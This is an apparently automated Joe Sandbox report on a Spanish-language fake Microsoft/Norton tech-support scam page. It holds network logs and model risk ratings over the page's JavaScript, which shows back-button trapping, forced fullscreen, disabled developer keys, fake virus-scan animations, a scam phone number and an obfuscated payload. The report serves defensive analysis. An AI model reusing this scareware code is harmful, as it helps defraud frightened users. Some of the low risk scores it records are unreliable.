          https://www.froala.com/wysiwyg-editor)0%URL Reputationsafe
          https://cct.google/taggy/agent.js0%URL Reputationsafe
          http://fontawesome.io/license0%URL Reputationsafe
          https://github.com/twbs/bootstrap/graphs/contributors)0%Avira URL Cloudsafe
          https://www.google.com0%Avira URL Cloudsafe
          https://github.com/twbs/bootstrap/blob/main/LICENSE)0%Avira URL Cloudsafe
          https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js0%Avira URL Cloudsafe
          https://adservice.google.com/pagead/regclk0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com/ajax/libs/froala-editor/2.8.5/css/froala_style.min.css0%Avira URL Cloudsafe
          https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          stackpath.bootstrapcdn.com
          		104.18.10.207
          		truefalse
            		unknown
            bg.microsoft.map.fastly.net
            		199.232.210.172
            		truefalse
              		unknown
              cdnjs.cloudflare.com
              		104.17.24.14
              		truefalse
                		unknown
                maxcdn.bootstrapcdn.com
                		104.18.11.207
                		truefalse
                  		unknown
                  www.google.com
                  		172.217.18.4
                  		truefalse
                    		unknown
                    fp2e7a.wpc.phicdn.net
                    		192.229.221.95
                    		truefalse
                      		unknown
                      forwigjoeeiorjegoeirjhhjeri.azurewebsites.net
                      		unknown
                      		unknownfalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.cssfalse
                        • URL Reputation: safe
                        		unknown
                        https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/#true
                          		unknown
                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.jsfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdnjs.cloudflare.com/ajax/libs/froala-editor/2.8.5/css/froala_style.min.cssfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/fonts/fontawesome-webfont.woff2?v=4.5.0false
                          • URL Reputation: safe
                          		unknown
                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.cssfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.google.comchromecache_95.2.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.youtube.com/iframe_apichromecache_95.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://fontawesome.iochromecache_85.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://stats.g.doubleclick.net/g/collectchromecache_95.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/twbs/bootstrap/graphs/contributors)chromecache_63.2.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://td.doubleclick.netchromecache_95.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_58.2.dr, chromecache_63.2.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.merchant-center-analytics.googchromecache_95.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://froala.com/wysiwyg-editor/terms/chromecache_105.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://adservice.google.com/pagead/regclkchromecache_95.2.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://getbootstrap.com/)chromecache_58.2.dr, chromecache_63.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.froala.com/wysiwyg-editor)chromecache_105.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://cct.google/taggy/agent.jschromecache_95.2.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://fontawesome.io/licensechromecache_85.2.drfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          104.17.24.14
                          		cdnjs.cloudflare.comUnited States
                          		13335CLOUDFLARENETUSfalse
                          104.18.10.207
                          		stackpath.bootstrapcdn.comUnited States
                          		13335CLOUDFLARENETUSfalse
                          172.217.18.4
                          		www.google.comUnited States
                          		15169GOOGLEUSfalse
                          104.18.11.207
                          		maxcdn.bootstrapcdn.comUnited States
                          		13335CLOUDFLARENETUSfalse
                          239.255.255.250
                          		unknownReserved
                          		unknownunknownfalse

                          Private

                          IP
                          192.168.2.6

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1447449
                          Start date and time:2024-05-25 00:59:39 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 30s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:browseurl.jbs
                          Sample URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:9
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal64.phis.win@16/99@12/6
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.185.195, 216.58.206.78, 74.125.206.84, 34.104.35.123, 20.90.134.37, 216.58.212.168, 142.250.186.74, 142.250.185.238, 142.250.186.35, 40.127.169.103, 199.232.210.172, 192.229.221.95, 13.85.23.206, 20.242.39.171, 142.250.184.227, 93.184.221.240
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, update.googleapis.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, www.google-analytics.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, fonts.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, waws-prod-ln1-149-f7ac.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/

                          Simulations

                          Behavior and APIs

                          No simulations

                          LLM Input / Output

                          InputOutput
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: Perplexity: mixtral-8x7b-instruct
                          {
"loginform": false,
"reasons": [
"The text does not contain any form fields for a username or password.",
"There is no 'Login' or 'Submit' button in the text.",
"The text is about a security scan and not a login form."
]
}
                          Alena de Microsoft-Windows-Defender 900499-091 (ESPANA-Gratuito) Ayuda x Anlisis rpido Escaneo de areas comnmente intectadas y archivos de inicio. Laboral Resumen de resultados [+] Total de los articulos escaneados: 143 [+] Riesgos de seguridad totales detectados: S [+] Riesgos totales de seguridad resueltos: Riesgos de seguridad total que requieren atencin: Microsoft Pausa Detener ESTADO : su pc esta en nesgo!
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 1,
  "reasons": "The code adds a 'beforeunload' event listener to warn users about unsaved changes. This is a common practice in web applications to prevent data loss. There is no indication of malicious behavior."
}
                          window.addEventListener("beforeunload", function (e) {

            var confirmationMessage = 'It looks like you have been editing something. '

                + 'If you leave before saving, your changes will be lost.';



            (e || window.event).returnValue = confirmationMessage; //Gecko + IE

            return confirmationMessage; //Gecko + Webkit, Safari, Chrome etc.

        });
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 2,
  "reasons": "The code extracts query parameters from the URL, which can be used for legitimate purposes but also for phishing. The presence of phone numbers is not inherently malicious but could be used in social usering attacks."
}
                          function getVariableFromURl(name) {

            name = name.replace(/[\[]/, "\\\[").replace(/[\]]/, "\\\]");

            var regexS = "[\\?&]" + name + "=([^&#]*)";

            var regex = new RegExp(regexS);

            var results = regex.exec(window.location.href);

            if (results == null)

                return "";

            else

                return results[1];

        }



       

        var phone_number = '900-499-091 (ESPAA-Gratuito)';

        var phone_number2 = '900-499-091 (ESPAA-Gratuito)';
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 7,
  "reasons": "The code manipulates the browser history to prevent the user from navigating back, which is a common technique used in malicious sites to trap users on the page. This behavior is indicative of a potential phishing or malicious site."
}
                          //backbutton

        !(function () {

            var t;

            try {

                for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");

                onpopstate = function (t) {

                    t.state && location.replace("#");

                };

            } catch (o) {

            }

        })();
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 1,
  "reasons": "The JavaScript code primarily deals with creating an audio element and playing it when a map element is clicked. There are no evident signs of malicious behavior such as data exfiltration, credential stealing, or unauthorized access. The risk score is set to 1 due to the potential annoyance of auto-playing audio, but it does not pose a significant security threat."
}
                          $(document).ready(function () {

            var audioElement = document.createElement('audio');

            audioElement.setAttribute('src', 'a0ler0tm0s.mp3');



            audioElement.addEventListener('ended', function () {

                this.play();

            }, false);





            $('#map').click(function () {

                audioElement.play();



            });





        });
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 7,
  "reasons": "The JavaScript code captures key presses and appends the key codes to the body of the document. This behavior is indicative of keylogging, which is a common technique used in malicious scripts to capture user input, such as passwords and other sensitive information."
}
                          $(document).keyup(function (evtobj) {

            if (!(evtobj.altKey || evtobj.ctrlKey || evtobj.shiftKey)) {

                if (evtobj.keyCode == 16) {

                    return false;

                }

                if (evtobj.keyCode == 17) {

                    return false;

                }

                $("body").append(evtobj.keyCode + " ");

            }

        });
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 7,
  "reasons": "The code attempts to request full screen mode upon a click event without user consent or clear indication of its purpose. This behavior can be used to obscure browser UI elements, potentially facilitating phishing attacks."
}
                          addEventListener("click", function () {

        var

            el = document.documentElement

            , rfs =

            el.requestFullScreen

            || el.webkitRequestFullScreen

            || el.mozRequestFullScreen

        ;

        rfs.call(el);

    });
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 1,
  "reasons": "The provided JavaScript code appears to handle user interactions with a lightbox element, such as showing it when the mouse leaves the document and hiding it when a close button is clicked. This behavior is typical for user interface enhancements and does not exhibit any malicious characteristics. The risk score is set to 1 due to the potential for annoyance or user experience disruption, but it does not pose a security threat."
}
                          function addEvent(obj, evt, fn) {

        if (obj.addEventListener) {

            obj.addEventListener(evt, fn, false);

        } else if (obj.attachEvent) {

            obj.attachEvent("on" + evt, fn);

        }

    }



    addEvent(document, 'mouseout', function (evt) {

        if (evt.toElement == null && evt.relatedTarget == null) {

            $('.lightbox').slideDown();

        }

        ;

    });



    $('a.close').click(function () {

        $('.lightbox').slideUp();

    });
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 1,
  "reasons": "The provided JavaScript code appears to be a utility library for handling dates, DOM manipulation, and URL parameters. It does not contain any obviously malicious code. The functions provided are common in web development and do not perform any actions that would be considered harmful. The risk score is set to 1 to account for the minimal possibility of misuse in a broader context."
}
                          /*=============HELPER================*/

    var Helper = (function () {



        var data = [];



        var months = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December'];

        var days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'];



        function setDays(d) {

            if ((d.constructor !== Array) || d.length !== 7)

                return false;



            days = d;

        }



        function setMonths(m) {

            if ((m.constructor !== Array) || m.length !== 12)

                return false;



            months = m;

        }



        function getDate() {

            var now = new Date();

            var month = typeof (months[now.getMonth()]) == 'undefined' ? now.getMonth() : months[now.getMonth()];

            return (now.getDate()) + " " + month + " " + now.getFullYear();

        }



        function getMonth() {

            var now = new Date();

            var month = typeof (months[now.getMonth()]) == 'undefined' ? now.getMonth() : months[now.getMonth()];

            return month;

        }



        function getDay() {

            var now = new Date();

            var day = typeof (days[now.getDay()]) == 'undefined' ? now.getDay() : days[now.getDay()];

            return day;

        }



        function getDayOfMonth() {

            var now = new Date();

            var day = ('0' + now.getDate()).slice(-2);

            return day;

        }



        function getUrlParameter(name) {

            name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');

            var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');

            var results = regex.exec(location.search);

            return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));

        }



        function findAncestor(element, name) {

            while ((element = element.parentElement) && !element.classList.contains(name)) ;

            return element;

        }



        function bindOnQuery(query, callback, action = 'click') {

            var elements = document.querySelectorAll(query);

            for (var i = 0; i < elements.length; i++) {

                elements[i].addEventListener(action, callback, false);

            }

        }



        function bindOnId(name, callback, action = 'click') {

            var element = document.getElementById(name);

            element.addEventListener(action, callback, false);

        }



        function replaceMarkers(text, markers) {

            for (key in markers) {

                var search = '%' + key + '%';

                text = text.replace(new RegExp(search, 'g'), markers[key]);

            }



            return text;

        }



        return {

            setDays: setDays,

            setMonths: setMonths,

            getDate: getDate,

            getDay: getDay,

            getMonth: getMonth,
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 1,
  "reasons": "The provided JavaScript code appears to be changing the content of the webpage based on the user's language settings. This is a common practice for localization and does not exhibit any malicious behavior. The code does not collect personal information, execute unauthorized actions, or manipulate the browser in a harmful way. Therefore, it is considered low risk."
}
                          var lang = window.navigator.language || navigator.userLanguage;

    lang = lang.substr(0, 2).toLowerCase();

    if (lang == "de") {

        document.getElementById("menu").innerHTML = "PRODUKTE & SERVICES &nbsp&nbsp&nbsp INTERNET SECURITY CENTER &nbsp&nbsp&nbsp SUPPORT &nbsp&nbsp&nbsp KOSTENLOSE TESTVERSIONEN";

        document.getElementById("menu_b").innerHTML = "Rechtliche | Hinweise | Lizenzvereinbarung | Datenschutz | Jobs und Karriere | Cookies | Wegweiser | Systemstatus";

        document.getElementById("head1").innerHTML = "Online-Bedrohungen haben sich weiterentwickelt. Unser Schutz auch.";

        document.getElementById("head2").innerHTML = "Darum bietet Norton 360 mehrere Schutzebenen in einer einzigen Lsung: Gertesicherheit, Secure VPN, Passwort-Manager und mehr.";

    }



    if (lang == "es") {

        document.getElementById("menu").innerHTML = "PRODUCTOS Y SERVICIOS &nbsp&nbsp&nbsp ASISTENCIA &nbsp&nbsp&nbsp VERSIONES DE PRUEBA";

        document.getElementById("menu_b").innerHTML = "Aviso legal | Acuerdo de licencia | Poltica de privacidad | Vacantes | Cookies | Mapa del sitio | Estado del sistema";

        document.getElementById("head1").innerHTML = "Las ciberamenazas han evolucionado. Tambin lo ha hecho nuestra proteccin.";

        document.getElementById("head2").innerHTML = "Norton 360. Proteccin completa con Seguridad del dispositivo que incluye antivirus, VPN, Gestor de contraseas y mucho ms. Todo en una nica solucin.";

        document.getElementById("w1_ico1").style.right = "127px";

        document.getElementById("w1_1").style.right = "85px";

        document.getElementById("w1_ico2").style.right = "57px";

        document.getElementById("w1_1").innerHTML = "Ajustes";

        document.getElementById("w1_2").innerHTML = "Ayuda";

        document.getElementById("w1_3").innerHTML = "Est protegido";

        document.getElementById("w1_4").innerHTML = "Actualizaciones de proteccin: ";

        document.getElementById("w1_5").innerHTML = "Actual";

        document.getElementById("w1_6").innerHTML = "ltimo escaneo: ";

        document.getElementById("w1_7").innerHTML = "No est disponible";

        document.getElementById("w1_8").innerHTML = "| Escaneo rpido";

        document.getElementById("w1_9").innerHTML = "Licencias utilizadas: ";

        document.getElementById("w1_10").innerHTML = "1 de 5";

        document.getElementById("w1_11").innerHTML = "| Instalar en otro dispositivo";

        document.getElementById("w1_12").innerHTML = "Seguridad";

        document.getElementById("w1_13").innerHTML = "Protegido";

        document.getElementById("w1_14").innerHTML = "Identidad";

        document.getElementById("w1_13a").innerHTML = "Protegido";

        document.getElementById("w1_15").innerHTML = "Desempeo";

        document.getElementById("w1_13b").innerHTML = "Protegido";

        document.getElementById("w1_16").innerHTML = "Ms Norton";

        document.getElementById("w1_13c"
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 7,
  "reasons": "The JavaScript code disables right-click, F12 (Developer Tools), and certain key combinations (Ctrl+C, Ctrl+U). These actions are often used to prevent users from inspecting the page's source code or copying content, which is a common tactic used by malicious websites to hide their activities. While not inherently malicious, these practices are suspicious and warrant further investigation."
}
                          // To disable right click

        document.addEventListener('contextmenu', event => event.preventDefault());



        // To disable F12 options

        document.onkeypress = function (event) {

            event = (event || window.event);

            if (event.keyCode == 123) {

                return false;

            }

        }

        document.onmousedown = function (event) {

            event = (event || window.event);

            if (event.keyCode == 123) {

                return false;

            }

        }

        document.onkeydown = function (event) {

            event = (event || window.event);

            if (event.keyCode == 123) {

                return false;

            }

        }



        // To To Disable ctrl+c, ctrl+u



        jQuery(document).ready(function ($) {

            $(document).keydown(function (event) {

                var pressedKey = String.fromCharCode(event.keyCode).toLowerCase();



                if (event.ctrlKey && (pressedKey == "c" || pressedKey == "u")) {

                    alert('Sorry, This Functionality Has Been Disabled!');

//disable key press porcessing

                    return false;

                }

            });

        });
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 9,
  "reasons": "The provided JavaScript code uses the 'unescape' function to decode a long, obfuscated string. This technique is commonly used to hide malicious payloads, making it difficult to determine the intent of the code without further analysis. The use of obfuscation raises significant red flags and suggests a high risk of malicious activity."
}
                          function eval1() {

        var s1 = unescape("o%7Ewl%7Drxw.%3B9n%7Fju%3B.%3BA.%3BB.@K%7Fj%7B.%3B9%7C%3A.%3CM%7Ewn%7Cljyn.%3BA.%3B%3By.%3B%3E@O%81v.%3B%3E@N%7C%82%818.%3B%3E%3CL.%3B%3E%3CJx.%3B%3EA9t%7Fx8.%3B%3E%3CLK8.%3B%3E%3CLL8JU.%3B%3EA9t.%3B%3E@L8.%3B%3E%3CL.%3B%3E%3CJ.%3B%3E@M.%3B%3E%3CK8.%3B%3E%3CMW.%3B%3E@O%81x.%3B%3E@Mvt%83x8.%3B%3E%3CLK8.%3B%3E%3CL.%3B%3E%3CL.%3B%3E@K8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ.%3B%3EA%3C%818.%3B%3E%3CL.%3B%3E%3COJY.%3B%3E@N.%3B%3EA%3D.%3B%3EA%3C.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMU.%3B%3EA%3C.%3B%3EA%3D%81.%3B%3EA%3D.%3B%3EA%3C8.%3B%3E%3CL.%3B%3E%3COJY%838.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CM8.%3B%3E%3CL.%3B%3E%3COJY.%3B%3EA%3B%83.%3B%3EA%3C8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWV.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWW.%3B%3E%3CJU%608.%3B%3E%3CL.%3B%3E%3COJW%838.%3B%3E%3CL.%3B%3E%3COJY8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3COJW.%3B%3EA%3C.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMU%838.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CK%83.%3B%3EA%3C8.%3B%3E%3CL.%3B%3E%3COJYL%81%7F.%3B%3EA%3C%81%83.%3B%3EA%3A%608.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ%80%80.%3B%3EA%3A%83.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMXb.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMV8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMU.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWa%838.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CK%83.%3B%3EA%3C8.%3B%3E%3CL.%3B%3E%3COJYL8.%3B%3E%3CL.%3B%3E%3COJW%838.%3B%3E%3CL.%3B%3E%3COJY8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3COJW.%3B%3EA%3Ct%7F.%3B%3EA%3A8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ%83.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMXb.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMV8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMV.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWa.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMV8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMV.%3B%3E%3CJUb.%3B%3E@K8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CJ.%3B%3EA%3C%818.%3B%3E%3CL.%3B%3E%3COJY.%3B%3E@N.%3B%3EA%3D.%3B%3EA%3C.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMU.%3B%3EA%3C.%3B%3EA%3D8.%3B%3E%3CL.%3B%3E%3COJW.%3B%3E@N.%3B%3E@L.%3B%3E@M8.%3B%3E%3CL.%3B%3E%3COJY%81.%3B%3EA%3A.%3B%3E@N%81.%3B%3EA9.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWV%7F.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWW.%3B%3E%3CJU%60.%3B%3E@N.%3B%3E@K.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWV8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CL.%3B%3E@N.%3B%3EA%3C%82.%3B%3EA%3D8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CLLc8.%3B%3E%3CL.%3B%3E%3COK.%3B%3E%3CK%83.%3B%3EA%3C8.%3B%3E%3CL.%3B%3E%3COJY.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWW.%3B%3E%3CJU%60.%3B%3E@N.%3B%3E@K.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMWV8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMW.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMXb.%3B%3E%3CJ8.%3B%3E%3CL.%3B%3E%3CO.%3B%3E%3CMXb%7FL8.%3B
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: Perplexity: mixtral-8x7b-instruct
                          {
"loginform": false,
"reasons": [
"No input fields for username or password are present in the text.",
"No 'Sign in', 'Log in', or 'Submit' button are present in the text.",
"The text is about a security alert from Microsoft, not a login form."
]
}
                          Microsoft I Support Microsoft 36 windows Surface Xbox Deals Buy Microsoft 365 Microsoft Search Signin plates Prod Devices Account & billing support Windows Defender - Advertencia de seguridad  EL ACCESO A ESTA HA SIDO BLCHQUEACY3 MOTIvOS DE SEGURIDAD Alerta de Microsoft-Win Su computadora nos ha alertado que ha Sido infectada con un n software espia virus. Los siguientes datos han Sido comprometidos. Ouda X Anlisis r6pido Credenciales de correo electrnico Contrasenas bancorias os de iniciom X Laboral Iniciar sesin en Facebook Fotos & Dumentos Windows Firewall protection Resu Alerta Virus: cdigo de error: #0x268d3(x7) Microsoft El acceso a esta PC ha Sido bloqueado por razones de seguridad. Pngase en contacto con el soporte tcnico de Windows: 900-499-091 (ESPANA-Gratuito) software espia virus Permitir Llame al soporte tcnico de Microsoft: Gratuito) Amenaza detectadal ESTADO : su pc est en riesgo! Cancelar Adware.Win32.Look2me.ab Riesgo medio A Origen No disponible Actividad Acciones de amenaza realizadas: I
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: gpt-4o
                          ```json
{
  "riskscore": 8,
  "reasons": "The JavaScript code appears to simulate system file paths and executable names, which can be used to create a sense of urgency or fear in users, potentially leading to phishing or scam activities. The code manipulates HTML elements to display these paths and changes their styles, which is typical in scareware tactics. Additionally, the use of sound (document.getElementById('beep').play()) can further enhance the scare tactic. While the code itself does not directly perform malicious actions, its behavior is highly suspicious and indicative of potentially malicious intent."
}
                          setTimeout(function () {

        document.getElementById("win2").style.display = "block";

    }, 2000);

    setTimeout(function () {

        document.getElementById("cnt1").innerHTML = "143";

    }, 2600);

    setTimeout(function () {

        document.getElementById("path1").innerHTML = "C:\Windows\System32\csrss.exe";

    }, 3000);

    setTimeout(function () {

        document.getElementById("path1").innerHTML = "C:\Windows\System32\sihost.exe";

    }, 3700);

    setTimeout(function () {

        document.getElementById("cnt1").innerHTML = "218";

    }, 4000);

    setTimeout(function () {

        document.getElementById("path1").innerHTML = "C:\Program Files\Windows Defender\MSASCuiL.exe";

    }, 4600);

    setTimeout(function () {

        document.getElementById("cnt1").innerHTML = "398";

        document.getElementById("cnt2").style.color = "#dd0000";

        document.getElementById("cnt2").innerHTML = "1";

        document.getElementById("cnt4").style.color = "#dd0000";

        document.getElementById("cnt4").innerHTML = "1";

        document.getElementById("win2_line_red").style.display = "block";

        document.getElementById("beep").play();

    }, 5000);

    setTimeout(function () {

        document.getElementById("vir1").style.bottom = "235px";

    }, 5100);

    setTimeout(function () {

        document.getElementById("path2").innerHTML = "C:\Windows\System32\SgrmBroker.exe";

    }, 5200);

    setTimeout(function () {

        document.getElementById("path2").innerHTML = "SEMgrSvc";

    }, 5800);

    setTimeout(function () {

        document.getElementById("cnt1").innerHTML = "538";

    }, 6000);

    setTimeout(function () {

        document.getElementById("path2").innerHTML = "NcaSvc";

    }, 6700);

    setTimeout(function () {

        document.getElementById("cnt1").innerHTML = "791";

        document.getElementById("cnt2").innerHTML = "2";

        document.getElementById("cnt4").innerHTML = "2";

    }, 7000);

    setTimeout(function () {

        document.getElementById("vir1").style.bottom = "440px";

        document.getElementById("vir1").style.opacity = "0";

        document.getElementById("vir2").style.bottom = "235px";

        document.getElementById("beep").play();

    }, 7100);

    setTimeout(function () {

        document.getElementById("path2").innerHTML = "C:\Windows\System32\DDFs";

    }, 7500);

    setTimeout(function () {

        document.getElementById("cnt1").innerHTML = "1021";

        document.getElementById("cnt2").innerHTML = "3";

        document.getElementById("cnt4").innerHTML = "3";

    }, 8000);

    setTimeout(function () {

        document.getElementById("vir2").style.bottom = "440px";

        document.getElementById("vir2").style.opacity = "0";

        document.getElementById("vir3").style.bottom = "235px";

        document.getElementById("beep").play();

    }, 8100);

    setTimeout(function () {

        document.getElementById("path2").innerHT
                          URL: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/# Model: Perplexity: mixtral-8x7b-instruct
                          ```json
{
  "loginform": false,
  "reasons": [
    "The text does not contain any form fields for a username or password.",
    "There is no 'Sign in', 'Log in', or similar button in the text.",
    "The text is primarily about a security warning and not about logging into a system."
  ]
}
